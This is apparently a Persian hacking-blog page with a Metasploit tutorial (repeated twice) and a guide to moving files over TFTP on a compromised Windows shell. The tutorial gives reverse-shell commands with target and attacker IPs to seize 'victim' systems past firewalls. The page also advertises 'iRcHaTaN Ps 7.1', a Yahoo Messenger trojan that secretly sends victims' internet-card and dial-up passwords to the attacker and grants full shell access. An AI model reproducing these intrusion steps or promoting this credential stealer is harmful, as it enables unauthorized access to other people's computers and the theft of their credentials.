معرفی Metasploit Framework و نحوه کار با آن

معرفی معرفی Metasploit Framework و نحوه کار با آن Metasploit Framework مجموعه ای از باگ های سیستم عامل ها و  برنامه های آن ها می باشد که به در یافت Shell و دسترسی کامل به سیستم هدف ختم میشود .در حال حاضر این مجموعه دارای 81 باگ می باشد که بسیاری از آن ها هنوز patch نشده وبرای هک کردن سرور و یا کلاینت ها بهترین انتخاب می باشد .این برنامه گزینه ی update داشته و خودش را بوسیله آن به روز می کنید و شما را از پیدا کردن bug های جدید و compile آن ها بی نیاز میکند .این برنامه حالت های payload مختلفی دارد که کارائی فراوانی دارد  برای شروع پس از دریافت آن از اینجا  و updtae  آن باید در داخل برنامه تایپ کنید show exploits که با این دستور لیست باگ ها نمایش می یابد و شما میتوانید با دستور use exploit name یکی از آن ها را اجرا کنید در آن جا ...          برای خواندن ادامه  اینجا کلیک کنید show PAYLOADS این دستور لیست حالت های اتصال را نمایش می دهد . مثلآ و قتی در سیستم طرف firewall وجود دارد با انتخاب payload ه win32_reverse                                                            با کمک این دستور set PAYLOAD win32_reverse به برنامه می گوئید که در  گرفتن shell سیستم ارتباط از طرف سیستم قربانی با شما باشد تا بتواند firewall را دور بزند (چون او به شما وصل شده و فایروال تنها با دریافت مشکل دارد) set RHOST 66.66.78.44 با این دستور به برنامه می گویید که ip remote host کسی که می خواهید از آن shell بگیرید 66.66.78.44  می باشد set LHOST 65.76.54.77 با کمک این دستور به برنامه می گوئید که ip شما 65.76.54.77 می باشد . این گزینه در حالت payload ه win32_reverse استفاده می شود تا سیستم قربانی به این ip وصل شود show TARGETS لیست سیستم های آسیب پذیر در این باگ را نمایش میدهد با عدد خاص رویروی آن مثلآ All Windows 0 شما با استفاده از دستور set TARGET 0  به برنامه میگوئید که All Windows می باشد show OPTIONS لیست متغیر های مقدار پذیر مانند RHOST و ... را با مقدار داده شده توسط شما نشان می دهد که برای کنترل درستی کار مفید می باشد exploit این دستور با داده های ورودی شما شروع به shell گرفتن می کند starting bind handler get connection from و نحوه کار با آن

Metasploit Framework مجموعه ای از باگ های سیستم عامل ها و  برنامه های آن ها می باشد که به در یافت Shell و دسترسی کامل به سیستم هدف ختم میشود .در حال حاضر این مجموعه دارای 81 باگ می باشد که بسیاری از آن ها هنوز patch نشده وبرای هک کردن سرور و یا کلاینت ها بهترین انتخاب می باشد .این برنامه گزینه ی update داشته و خودش را بوسیله آن به روز می کنید و شما را از پیدا کردن bug های جدید و compile آن ها بی نیاز میکند .این برنامه حالت های payload مختلفی دارد که کارائی فراوانی دارد  برای شروع پس از دریافت آن از اینجا  و updtae  آن باید در داخل برنامه تایپ کنید show exploits که با این دستور لیست باگ ها نمایش می یابد و شما میتوانید با دستور use exploit name یکی از آن ها را اجرا کنید show PAYLOADS این دستور لیست حالت های اتصال را نمایش می دهد . مثلآ و قتی در سیستم طرف firewall وجود دارد با انتخاب payload ه win32_reverse                                                            با کمک این دستور set PAYLOAD win32_reverse به برنامه می گوئید که در  گرفتن shell سیستم ارتباط از طرف سیستم قربانی با شما باشد تا بتواند firewall را دور بزند (چون او به شما وصل شده و فایروال تنها با دریافت مشکل دارد) set RHOST 66.66.78.44 با این دستور به برنامه می گویید که ip remote host کسی که می خواهید از آن shell بگیرید 66.66.78.44  می باشد set LHOST 65.76.54.77 با کمک این دستور به برنامه می گوئید که ip شما 65.76.54.77 می باشد . این گزینه در حالت payload ه win32_reverse استفاده می شود تا سیستم قربانی به این ip وصل شود show TARGETS لیست سیستم های آسیب پذیر در این باگ را نمایش میدهد با عدد خاص رویروی آن مثلآ All Windows 0 شما با استفاده از دستور set TARGET 0  به برنامه میگوئید که All Windows می باشد show OPTIONS لیست متغیر های مقدار پذیر مانند RHOST و ... را با مقدار داده شده توسط شما نشان می دهد که برای کنترل درستی کار مفید می باشد exploit این دستور با داده های ورودی شما شروع به shell گرفتن می کند starting bind handler get connection from

آموزش ارسال و دریافت فایل در shell با tFtp

وقتی که ما از یک Server و یا یک Client با استفاده از باگ آن (بطور مثال  Lsass ,Dcom ,IIS ,Apache,Mysql ,...)  یک سطح دسترسی (Shell ) می گیریم می تونیم اونجا مثل Command pormpt سیستم خودمون کارائی انجام بدیم و لی برای ارسال و دریافت فایل باید از tftp  استفاده کنیم .کلاینت این برنامه در شاخه ی System32 همه ی سیستم عامل های windows هستش و شما می تونید با  اجرا کردن tftp که از اینجا میتونید داونلودش کنید در سیستم خودتون نقش  Server رو بازی کنید و چون به کلاینت اون دسترسی دارید  بهش دستور ارسال و دریافت از Server تون که تو سیستم  شما در حال اجراست رو بدید (یک ارتباط Client & ُServer ای ) خوب برای شروع این کار بعد از Download کردن Tftp از اینجا فایل tftpd32.exe رو از توش اجرا کنید و قتی که باز شد   برای خوندن ادامش اینجا کلیک کنید

iRcHaTaN Ps 7.1

با قابلیت های جدید

‍‍نسخه جدید برنامه ی iRcHaTaN Ps  که مانند نسخه قبلی در یاهو 7 کار میکنید البته با قابلیت های جدید مثل ارسال  (user,pass,number) کارت اینترنتی | dial up password ‍‍‍‍  و گرفتن شل( دسترسی کامل به  کام‍یوتر قربانی)                                                 برای دریافت iRcHaTaN Ps 7.1 اینجا کلیک کنید در این نسخه از برنامه قابلیت ارسال password کارت های اینترنتی افزوده شده و هم چنین شما در این نسخه میتوانید از قربانی شل بگیرید و کنترل کامل سیستم قربانی را به عهده بگیرید  و هم چنین قابلیت ارسال email با سیستم injection افزوده شده که می تواند از فایروال نیز عبور کرده و ایمیل ارسال کند .pm ارسالی در این نسخه توسط قربانی قابل رویت نیست و شما می توتانید از 2 mode ایمیل و pm هم زمان استفاده کنید .حتی اگر قربانی یاهو مسنجر نداشته باشد password کارت اینترت او برای شما ارسال می شود و هم چنین می توانید از وی شل بگیرید. دیگر امکانات برنامه در عکس برنامه قابل رویت می باشد و ما بقی در help برنامه موجود است